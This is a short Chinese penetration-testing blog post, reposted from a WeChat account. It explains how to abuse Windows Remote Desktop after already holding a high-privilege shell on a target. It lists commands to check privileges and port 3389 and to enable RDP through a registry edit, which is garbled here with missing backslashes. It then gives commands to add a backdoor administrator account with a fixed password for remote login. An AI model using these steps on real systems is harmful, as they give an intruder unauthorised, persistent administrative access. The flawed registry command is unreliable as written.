【内网渗透】Windows远程桌面利用

admin 2023年11月30日13:48:33评论22 views字数 685阅读2分17秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

前情提要

本次利用的前提是在已经渗透到目标系统,成功连接shell,并为windows系统且为高权限,未设置白名单只能本地连接

内网渗透

查看当前用户权限,确认为高权限。

whoami

【内网渗透】Windows远程桌面利用

查看一下3389端口开放情况(下图的情况是3389端口已经开启了,没开启就没有回显。)

netstat -an | find "3389"

【内网渗透】Windows远程桌面利用

如果没有回显,可以使用如下命令开启3389端口。

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

【内网渗透】Windows远程桌面利用

顺便我这里给出关闭端口命令

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

添加用户

net user test xiaochou /add # 添加账户密码net localgroup administrators test /add # 给test账户添加为管理员权限net user test # 查询是否成功添加test用户

【内网渗透】Windows远程桌面利用

 这样使用账号:test,密码:xiaochou 登录远程桌面

【内网渗透】Windows远程桌面利用

原文始发于微信公众号(Devil安全):【内网渗透】Windows远程桌面利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月30日13:48:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网渗透】Windows远程桌面利用http://cn-sec.com/archives/2255055.html

发表评论

匿名网友 填写信息